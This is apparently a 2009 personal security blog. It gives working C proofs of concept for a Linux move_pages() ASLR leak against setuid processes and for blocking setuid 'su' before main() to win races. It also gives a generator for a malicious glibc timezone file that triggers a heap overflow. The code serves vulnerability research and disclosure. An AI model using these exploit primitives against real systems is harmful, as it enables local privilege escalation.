Dividead's Blog

NUMA and ASLR 2009/08/28

Posted by dividead in Uncategorized.
Tags: ASLR, bug, kernel, linux, NUMA

In the same link mentioned in my previous post, Tinnes hinted at interesting things to be done with NUMA when having CAP_SYS_NICE through, say, pulseaudio.

I have no idea whether this is the issue he was referring to, but if it is, then it is actually far more usable than he sketched: the credentials check is rather wide, and the whole thing is reliably usable in local exploits without having to go through the trouble of getting CAP_SYS_NICE.

When checking out the NUMA code in the Linux kernel I found the following interesting case in the move_pages() system call, which is defined in mm/migrate.c and is meant to move pages between NUMA nodes, but can also query the status of pages.

        /*
         * Check if this process has the right to modify the specified
         * process. The right exists if the process has administrative
         * capabilities, superuser privileges or the same
         * userid as the target process.
         */
        rcu_read_lock();
        tcred = __task_cred(task);
        if (cred->euid != tcred->suid && cred->euid != tcred->uid &&
            cred->uid  != tcred->suid && cred->uid  != tcred->uid &&
            !capable(CAP_SYS_NICE)) {
                rcu_read_unlock();
                err = -EPERM;
                goto out;
        }
        rcu_read_unlock();

This credentials check certainly looks interesting, and is easy to pass when we have CAP_SYS_NICE, but there is more. First of all note that tcred specifies the credentials of the remote task, and cred the credentials of the current one. This test is therefore also passed if the remote uid or saved uid is equal to either our current uid or our effective uid. This is easy to satisfy for all setuid root executables, as the real uid of the remote process will start out as the uid of the process that calls execve() on it.

So, if we spawn a process, then we can pass the credentials check in move_pages() and query their status.

Let’s whip something up which queries pages through move_pages() to verify this.

/* dividead 2009 */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/syscall.h>

#define MOVE_PAGES_NUM          65536
#define PAGE_SZ                 4096
#define ERROR(x)                ((x) == -EFAULT || (x) == -ENOENT)

int main(int argc, char **argv)
{
        /* static, to keep these large arrays off the stack */
        static void *address[MOVE_PAGES_NUM];
        static int status[MOVE_PAGES_NUM];
        int start_used = 0;
        int wrapped = 0;
        unsigned int i, j;
        uintptr_t p = 0;        /* scan from address 0, page by page */
        void *start = NULL;
        pid_t pid;

        if (argc != 2) {
                fprintf(stderr, "usage: numa <pid>\n");
                exit(EXIT_FAILURE);
        }

        pid = atoi(argv[1]);

        do {
                long ret;

                /* Build one batch of page addresses; stop once p wraps. */
                for (i = 0; i < MOVE_PAGES_NUM && !wrapped; i++) {
                        address[i] = (void *)p;
                        p += PAGE_SZ;
                        wrapped = (p == 0);
                }

                /* nodes == NULL: move nothing, only report each page's status */
                ret = syscall(__NR_move_pages, pid, (unsigned long)i,
                              address, NULL, status, 0);
                if (ret == -1) {
                        perror("move_pages()");
                        exit(EXIT_FAILURE);
                }

                /* Print each run of consecutive present pages as start-end. */
                for (j = 0; j < i; j++) {
                        if (ERROR(status[j]) && start_used) {
                                printf("%p-%p\n", start, address[j]);
                                start_used = 0;
                        } else if (!ERROR(status[j]) && start_used == 0) {
                                start = address[j];
                                start_used = 1;
                        }
                }
        } while (!wrapped);

        return 0;
}

[dividead ~]$ id
uid=500(dividead) gid=500(dividead) groups=500(dividead)
[dividead ~]$ ps aux | grep "su -" | grep -v grep
root     19908  0.0  0.0 130992  1248 pts/3    S+   22:32   0:00 su -
[dividead ~]$ cat /proc/19908/status | grep Uid
Uid:    500     0       0       0
[dividead ~]$ ./numa 19908
0x400860-0x405860
0x407860-0x409860
0x609860-0x60a860
0xdf4860-0xe04860
0x3d71200860-0x3d7121b860
0x3d7121c860-0x3d7121d860
0x3d7141e860-0x3d71420860
...

As I’m running on x86-64, scanning the whole address space this way will still take forever, but given some additional information, such as knowing that the three most significant bytes of the address ranges are not mangled by ASLR anyway, we can determine where things are mapped pretty decently.

Blocking between execution and main() 2009/07/21

Posted by dividead in Security.
Tags: glibc, rtld

Recently http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html was brought to my attention and, having a bit of spare time on my hands, I decided to investigate a casual remark Tinnes made about forcing a process to block after being executed but before reaching the main() function. In the case of the pulseaudio flaw this is useful to exploit the race condition reliably.

My first thought was that such a block should be easy if we could still have glibc rtld print data to stdout or stderr for diagnostic purposes, and have this print block. First there is the question of whether rtld.c still allows us to do such things, and it seems that specifying something silly like the following works:

[dividead ~]$ LD_PRELOAD=foo ping
ERROR: ld.so: object 'foo' from LD_PRELOAD cannot be preloaded: ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

Now that we have found rtld.c generating output before main() is even called, we need to have this block in setuid programs. The easiest way I can think of doing this is by creating a pipe in a parent process, filling this pipe completely without reading from it, and forking a child which replaces fd 1 and 2 with the write half of the pipe before executing the setuid program we target.

/* -- dividead 2009 */
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

void fd_set_blocking(int fd)
{
        int flags;

        if ( (flags = fcntl(fd, F_GETFL)) == -1) {
                perror("fcntl()");
                exit(EXIT_FAILURE);
        }

        if (flags & O_NONBLOCK) {
                flags &= ~O_NONBLOCK;
                if (fcntl(fd, F_SETFL, flags) == -1) {
                        perror("fcntl()");
                        exit(EXIT_FAILURE);
                }
        }
}

void fd_set_nonblocking(int fd)
{
        int flags;

        if ( (flags = fcntl(fd, F_GETFL)) == -1) {
                perror("fcntl()");
                exit(EXIT_FAILURE);
        }

        if ( !(flags & O_NONBLOCK) ) {
                flags |= O_NONBLOCK;
                if (fcntl(fd, F_SETFL, flags) == -1) {
                        perror("fcntl()");
                        exit(EXIT_FAILURE);
                }
        }
}

ssize_t xwrite(int fd, const void *buf, size_t count)
{
        ssize_t ret;

        do {
                ret = write(fd, buf, count);
        } while (ret == -1 && errno == EINTR);

        if (ret == -1 && errno != EAGAIN) {
                perror("write()");
                exit(EXIT_FAILURE);
        }

        return ret;
}

int xdup2(int oldfd, int newfd)
{
        int ret;

        if ( (ret = dup2(oldfd, newfd)) == -1) {
                perror("dup2()");
                exit(EXIT_FAILURE);
        }

        return ret;
}

int xputenv(char *string)
{
        int ret;

        if ( (ret = putenv(string)) != 0) {
                perror("putenv()");
                exit(EXIT_FAILURE);
        }

        return ret;
}

int main(void)
{
        pid_t pid;
        ssize_t ret;
        int pipefd[2];
        char buf[4096];

        /* Create a pipe, we use this to read from the child we spawn. */
        if (pipe(pipefd) == -1) {
                perror("pipe()");
                exit(EXIT_FAILURE);
        }

        /* Set it non-blocking, so we can fill the pipe buffer */
        fd_set_nonblocking(pipefd[1]);

        /* Fill the pipe buffer.  As a small optimization, first use page
         * granularity, then fill out with single bytes until done.
         */
        do {
                ret = xwrite(pipefd[1], buf, 4096);
        } while ( !(ret == -1 && errno == EAGAIN) );

        do {
                ret = xwrite(pipefd[1], buf, 1);
        } while ( !(ret == -1 && errno == EAGAIN) );


        /* Now the pipe is full, causing the child to block when writing
         * to it.  We set it back to blocking again.
         */
        fd_set_blocking(pipefd[1]);
        switch(pid = fork()) {
        case -1:
                perror("fork()");
                exit(EXIT_FAILURE);
        case 0:
                close(pipefd[0]);
                xdup2(pipefd[1], 1);
                xdup2(pipefd[1], 2);
                xputenv("LD_PRELOAD=foo");
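                execl("/bin/su", "su", (char *)NULL);
                /* Only reached if execl() failed.  Do not print here:
                 * stderr is the full pipe, so the message would block.
                 */
                _exit(EXIT_FAILURE);
        default:
                /* Keep the pipe full until a key is pressed. */
                fgetc(stdin);
        }

        return 0;
}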

Running this should result in a ‘su’ process owned by root that is blocking in _dl_debug_vdprintf(), giving us ample opportunity to do everything we want, and then start draining the pipe in the parent process. I have no idea whether this was the method found by Tinnes, but it is trivial enough when you think about it for half an hour.

glibc timezone integer overflow 2009/06/01

Posted by dividead in Security.
Tags: glibc, heap overflow, integer overflow, php, Security, udrepper is a goon

Years ago I found a cute integer overflow in the timezone handling in glibc, but back then I put it on my list of ‘bugs to check out in the future if I have more time’. Of course I never found this time (the density of my blog updates gives a nice impression of my spare time), but I was surprised to see that the problem still exists in recent versions of glibc.

I present it here, as I do not feel like contacting glibc upstream about this issue knowing the maintainer is even more friendly, cooperative, and socially well-adapted than a certain OpenBSD maintainer. http://blog.aurel32.net/?p=47 illustrates this nicely.

Before wasting time of my readers, I want to point out that the impact of this bug is not extensive, and I’d be surprised if someone would manage to make a decent exploit out of this.

The problem is in the __tzfile_read function present in glibc, and a paste of the source code follows. I took the liberty of cutting the irrelevant parts out, to not bother the reader with details.

void
__tzfile_read (const char *file, size_t extra, char **extrap)
{
  ...
  if (file == NULL)
    /* No user specification; use the site-wide default.  */
    file = TZDEFAULT;
  else if (*file == '\0')
    /* User specified the empty string; use UTC with no leap seconds.  */
    goto ret_free_transitions;
  else
    {
      /* We must not allow to read an arbitrary file in a setuid
         program.  So we fail for any file which is not in the
         directory hierachy starting at TZDIR
         and which is not the system wide default TZDEFAULT.  */
      if (__libc_enable_secure
          && ((*file == '/'
               && memcmp (file, TZDEFAULT, sizeof TZDEFAULT)
               && memcmp (file, default_tzdir, sizeof (default_tzdir) - 1))
              || strstr (file, "../") != NULL))
        /* This test is certainly a bit too restrictive but it should
           catch all critical cases.  */
        goto ret_free_transitions;
    }
  ...
  num_transitions = (size_t) decode (tzhead.tzh_timecnt);
  num_types = (size_t) decode (tzhead.tzh_typecnt);
  chars = (size_t) decode (tzhead.tzh_charcnt);
  num_leaps = (size_t) decode (tzhead.tzh_leapcnt);
  num_isstd = (size_t) decode (tzhead.tzh_ttisstdcnt);
  num_isgmt = (size_t) decode (tzhead.tzh_ttisgmtcnt);
  ...
  total_size = num_transitions * (sizeof (time_t) + 1);
  total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                & ~(__alignof__ (struct ttinfo) - 1));
  types_idx = total_size;
  total_size += num_types * sizeof (struct ttinfo) + chars;
  total_size = ((total_size + __alignof__ (struct leap) - 1)
                & ~(__alignof__ (struct leap) - 1));
  leaps_idx = total_size;
  total_size += num_leaps * sizeof (struct leap);
  tzspec_len = (sizeof (time_t) == 8 && trans_width == 8
                ? st.st_size - (ftello (f)
                                + num_transitions * (8 + 1)
                                + num_types * 6
                                + chars
                                + num_leaps * 8
                                + num_isstd
                                + num_isgmt) - 1 : 0);

  /* Allocate enough memory including the extra block requested by the
     caller.  */
  transitions = (time_t *) malloc (total_size + tzspec_len + extra);
  if (transitions == NULL)
    goto lose;
  ...
      if (__builtin_expect (fread_unlocked (transitions, trans_width + 1,
                                            num_transitions, f)
                            != num_transitions, 0))
        goto lose;

The first thing I want to point out is the limited scope of this issue. The checks starting on line 17 of the listing (the __libc_enable_secure test) limit the use of the TZ environment variable (the file parameter to __tzfile_read is derived from the TZ environment variable in other places in the source code), protecting against the use of arbitrary timezone files in SUID and SGID programs. A funny detail is the strstr() check on line 21, which does not account for TZ ending with a double-dot, so we’re able to have __tzfile_read open the directory above the default timezone database directory. Reading from a directory will most likely just fail with EISDIR though, so this is useless.

Another thing to note is that TZDIR is a variable mentioned in sysdeps/generic/unsecvars.h, so we will not be able to use it in SUID or SGID programs either. This means that we will not be able to exploit this problem in an easy local situation.

Before continuing, let’s look at the bug closely first. In lines 27 through 32 of the listing __tzfile_read decodes the header counts from a timezone file, and lines 34 through 50 perform some calculations based on them. On line 54 malloc() gets called with a size which we control, and which we can easily get to evaluate to 0 or something similarly small. Finally on line 58 fread_unlocked() reads the timezone data into this allocated buffer using a length computed in a different way (trans_width + 1 bytes per transition), leading to a perfectly controllable heap overflow.

Code to generate such a trigger follows:

#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>

#define TZ_MAGIC        "TZif"

#define PUT_32BIT_MSB(cp, value)                                        \
        do {                                                            \
                (cp)[0] = (value) >> 24;                                \
                (cp)[1] = (value) >> 16;                                \
                (cp)[2] = (value) >> 8;                                 \
                (cp)[3] = (value);                                      \
        } while (0)

struct tzhead {
        char    tzh_magic[4];
        char    tzh_version[1];
        char    tzh_reserved[15];
        char    tzh_ttisgmtcnt[4];
        char    tzh_ttisstdcnt[4];
        char    tzh_leapcnt[4];
        char    tzh_timecnt[4];
        char    tzh_typecnt[4];
        char    tzh_charcnt[4];
};

struct ttinfo
  {
    long int offset;
    unsigned char isdst;
    unsigned char idx;
    unsigned char isstd;
    unsigned char isgmt;
  };

int main(void)
{
        struct tzhead evil;
        int i;
        char *p;
        uint32_t total_size;
        uint32_t evil1, evil2;

        /* Initialize static part of the header */
        memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
        evil.tzh_version[0] = 0;
        memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
        memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
        memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
        memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
        memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));

        /* Initialize nasty part of the header */
        evil1 = 500;
        PUT_32BIT_MSB(evil.tzh_timecnt, evil1);

        total_size = evil1 * (sizeof(time_t) + 1);
        total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
                & ~(__alignof__ (struct ttinfo) - 1));

        /* value of chars, to get a malloc(0) */
        evil2 = 0 - total_size;
        PUT_32BIT_MSB(evil.tzh_charcnt, evil2);

        p = (char *)&evil;
        for (i = 0; i < (int)sizeof(evil); i++)
                printf("%c", p[i]);

        /* data we overflow with */
        for (i = 0; i < 50000; i++)
                printf("A");
}

__tzfile_read can be reached through many functions, such as tzset() and localtime(), so as an example from a non-s[ug]id file we can use the following:

#include <time.h>

int main(void)
{
        time_t t = time(NULL);

        /* localtime() ends up in __tzfile_read via tzset handling */
        localtime(&t);
        return 0;
}

[dividead test]$ ./mkevil > evil ; TZ=`pwd`/evil ./a.out
*** glibc detected *** ./a.out: free(): invalid next size (fast): 0x000000000192a270 ***

Now that we know for sure this bug can be triggered, we need to determine the cases where this can actually happen. Due to the security checking glibc does, the scope is very limited, and we need to have a program which allows us to control either the TZ or the TZDIR environment variable somehow.

A possible example is the old style method to set timezones in PHP, assuming it is not running in safe mode. This was accomplished through putenv("TZ=/foo/bar/evil"); and funnily PHP will immediately call tzset() whenever it encounters a putenv() on TZ. This indeed results in PHP crashes, but of course one needs to be able to upload files in the first place, have PHP perform a putenv() on data we control (either completely, in which case we have many more security issues, or on the value part of TZ or TZDIR), and have PHP not running in safe mode.

Maybe more interesting options are possible.

Ramblings on static deobfuscation 2009/03/06

Posted by dividead in Reverse engineering.
Tags: obfuscation

The past few days while not at work I have been thinking a bit about binary deobfuscation, as I’m spending some of my spare time cracking an obfuscated binary.

The anti-disassembly and anti-debugging tricks used in this binary are fairly extensive, ranging from jmps into the middle of instructions (why does this still throw IDA Pro off guard this much? At least in a graph representation it should be easily possible to follow both execution paths, so that they can be displayed in an intuitive manner), to insertion of redundant code, nanomites all over the place and so on.

The redundant code introduced by their protection scheme is fairly standard though, and comes down to inserted ranges of nop-equivalent code. These redundancies can be easily eliminated through static peephole optimizations, which I implemented in a simple IDC script. However, when one thinks about this a bit, peephole optimization to eliminate such code is a fairly unsafe process if the introduced redundant code is more sophisticated.

To illustrate this, I often ran into an instruction pair such as:

        xchg    eax, edx
        xchg    eax, edx

Of course my IDC script quickly eliminated this as redundant code, but now consider the following situation:

        xchg    eax, edx
yadda:
        xchg    eax, edx

Obviously this means we cannot trivially eliminate these xchg pairs as they’re not part of the same basic block. We might be able to eliminate them though if all execution paths leading to ‘yadda’ also contain an instruction such as xchg eax, edx. This is already less trivial, but addressable by static analysis tools.

But how about the situation where the disassembler, say IDA, cannot find a cross reference to yadda in the first place? I.e. when yadda is a dynamically calculated target? This would mean that my script (and likely others that focus on static reduction of redundant code) will eliminate these instructions without a second thought, making it a destructive operation.

Now forceful construction of such situations is also doable; suppose at some point in the original program there is an xchg eax, edx instruction. We could then decide to create a stub function in the program containing only code that looks like no-ops, for example the following:

yadda:
        add     eax, 10
        sub     eax, 20
        lea     eax, [eax+10]
        pushf
        test    eax, 0xbadc0de
        popf
        xchg    eax, edx
        xchg    eax, edx
        and     edx, 0xFFFFFFFF
        ret

This would look like a function containing only redundant code, and we could insert calls to it in many places, which deobfuscators would likely eliminate together with the function itself. But if we start replacing xchg eax, edx instructions in our original program with dynamically calculated call instructions to the second xchg instruction in the function, such an elimination becomes a destructive operation.

This example presented such a trick by abusing two instructions in a row, but it may also be possible to perform this trick when an instruction with multiple bytes is involved, where for instance the operand is an instruction itself. Consider:

yadda:
        and    esi, esi

Dynamically branching to yadda + 1 (which by the way is 0xF6 — the opcode for div) will also wreak havoc on unsuspecting redundancy elimination. Pure static analysis of binaries containing these tricks seems a fairly inadequate approach to me.

Foundry SuperX SSH authentication 2009/03/02

Posted by dividead in Networking.
Tags: braindead design, foundry

Today a new Foundry FastIron SuperX Premium switch was delivered at my work, so of course I took the opportunity to play around with it.

Setting up ssh public-key authentication to login to the management cli was one of my goals, as being a programmer I’m bored with repetitive tasks such as typing the same password over and over again.

Sadly, this process was far messier than one could hope for, especially when comparing it to Juniper routers, which allow you to copy and paste an OpenSSH style public key directly into the configuration, after which it just works.

The firmware version I worked with was the following, in case your mileage varies.
Compressed Pri Code size = 3811736, Version 04.0.01aT3e3 (SXR04001a.bin)
Compressed Sec Code size = 3156827, Version 04.0.01aT3e1 (SXL04001a.bin)
Compressed BootROM Code size = 524288, Version 04.0.00T3e5

First we need to create a user account, and allow it to be used for local authentication.
username foobar privilege 0 password fnord
aaa authentication login default local

Now we need to setup the SSH server itself, by generating a host keypair, and making sure that users need to specify a password when logging in.
ip ssh permit-empty-password no
crypto key generate

Please note that setting permit-empty-password to yes turns off password authentication entirely, instead of (what we would intuitively expect) allowing users without a password to login over ssh. This invites some really messed up ‘secure’ configurations if people do not pay attention.

At this point it should be possible to login through ssh using a password. Ideally I would like to use pubkey based authentication, but sadly the interface allows us to upload public-keys only over TFTP (although scp seems possible too as long as the management blade has additional PCMCIA flash modules installed).
An additional annoyance is the fact that the firmware only accepts RFC 4716 style keys, so we have to convert any OpenSSH style key by doing the following.
ssh-keygen -e -f id_dsa.pub > id_dsa.pub.ssh2

This file should be offered on a tftp server, so that on the foundry we can import it. According to the documentation these keys are stored on EEPROM immediately.
ip ssh pub-key-file tftp 1.2.3.4 id_dsa.pub.ssh2

Well, by no means trivial, but finally this should allow for public-key authentication, or not? It seems that as soon as public-key authentication is tried, we suffer from the following message.
Authenticated with partial success.

It seems that after a successful public-key authentication attempt, the Foundry still wants me to perform password authentication, which certainly seems absurd. Of course we can work around this by disallowing password authentication altogether.
ip ssh password-authentication no

This is suboptimal when we have a combination of users with passwords and public keys, as well as not allowing me to login through ssh with just a password in case I do not have my pubkey at hand…

Well, this part of the Foundry interface seems more braindead than the average Resident Evil denizen…

First post! 2009/01/30

Posted by dividead in Uncategorized.

Welcome to a blog dedicated to all my technical ramblings, from computer security to ren’ai and bishoujo game internals.

I will periodically post about reverse engineering work I did in my spare time for various game engines, my views on computer security, or my ramblings in general if I feel like it.
